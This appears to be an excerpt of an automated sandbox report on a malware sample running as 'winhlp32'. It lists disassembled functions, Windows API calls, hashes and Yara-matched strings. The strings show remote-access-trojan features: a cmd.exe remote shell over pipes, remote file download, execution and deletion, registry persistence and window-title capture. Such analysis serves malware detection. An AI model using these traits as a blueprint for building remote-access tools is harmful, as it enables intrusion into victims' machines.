                                    • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                    • RegSetValueExA.KERNELBASE(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                    • RegCloseKey.KERNELBASE(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: pth_unenc
                                    • API String ID: 1818849710-4028850238
                                    • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                    • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                    • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
                                    • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                    • CreateThread.KERNELBASE(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000), ref: 00404DDB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2579639479-0
                                    • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                    • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                    • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                    • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                    • GetLastError.KERNEL32 ref: 0040D083
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateErrorLastMutex
                                    • String ID: SG
                                    • API String ID: 1925916568-3189917014
                                    • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                    • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                    • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventObjectSingleWaitsend
                                    • String ID:
                                    • API String ID: 3963590051-0
                                    • Opcode ID: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                    • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                    • Opcode Fuzzy Hash: a00f43e109d8a5bcbea84027ff4f42fb49a7104e756b4714260ac134e081549c
                                    • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                    • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                    • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                    • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
                                    • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                    • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                    • RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                    • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
                                    • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
                                    • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                    • RegCloseKey.KERNELBASE(?), ref: 00413592
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                    • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                    • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                    • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                                    • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 3677997916-0
                                    • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                    • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                                    • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                    • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                    • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                    • RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID:
                                    • API String ID: 1818849710-0
                                    • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                    • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                                    • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                    • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                    • recv.WS2_32(?,?,?,00000000), ref: 00404BDA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: EventObjectSingleWaitrecv
                                    • String ID:
                                    • API String ID: 311754179-0
                                    • Opcode ID: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                    • Instruction ID: 1d69a7fd2e689c68354a0251ffa64299bfe08f5f9c70e8df09ea9ad7bb005133
                                    • Opcode Fuzzy Hash: 027f0035fd30dc323b2ad7daf66a247a767f4e031cde928d6a9ffdf935cc617f
                                    • Instruction Fuzzy Hash: 00F08236108213FFD7059F10EC09E4AFB62FB84721F10862AF510522B08771FC21DBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: pQG
                                    • API String ID: 176396367-3769108836
                                    • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                    • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                                    • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                                    • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: GlobalMemoryStatus
                                    • String ID: @
                                    • API String ID: 1890195054-2766056989
                                    • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                    • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                                    • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateEventStartupsocket
                                    • String ID:
                                    • API String ID: 1953588214-0
                                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0041BAB8
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$ForegroundText
                                    • String ID:
                                    • API String ID: 29597999-0
                                    • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                                    • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                    • _free.LIBCMT ref: 00450140
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                                    • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                                    • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                    • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                    • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                    • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                                    • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                                    • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                    • DeleteFileA.KERNEL32(?), ref: 00408652
                                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                    • API String ID: 1067849700-181434739
                                    • Opcode ID: 365c292aa1571a8d7161d96b4c003a35a4d8bf20842a391a35ee013fa3951f57
                                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                    • Opcode Fuzzy Hash: 365c292aa1571a8d7161d96b4c003a35a4d8bf20842a391a35ee013fa3951f57
                                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004056E6
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __Init_thread_footer.LIBCMT ref: 00405723
                                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                    • CloseHandle.KERNEL32 ref: 00405A23
                                    • CloseHandle.KERNEL32 ref: 00405A2B
                                    • CloseHandle.KERNEL32 ref: 00405A3D
                                    • CloseHandle.KERNEL32 ref: 00405A45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                    • API String ID: 2994406822-18413064
                                    • Opcode ID: dd01ecda73a6b06cf9be688a0092eaf718524a90761ad714d388e20eb5f9c59a
                                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                    • Opcode Fuzzy Hash: dd01ecda73a6b06cf9be688a0092eaf718524a90761ad714d388e20eb5f9c59a
                                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                      • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                      • Part of subcall function 00413877: RegCloseKey.KERNELBASE(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
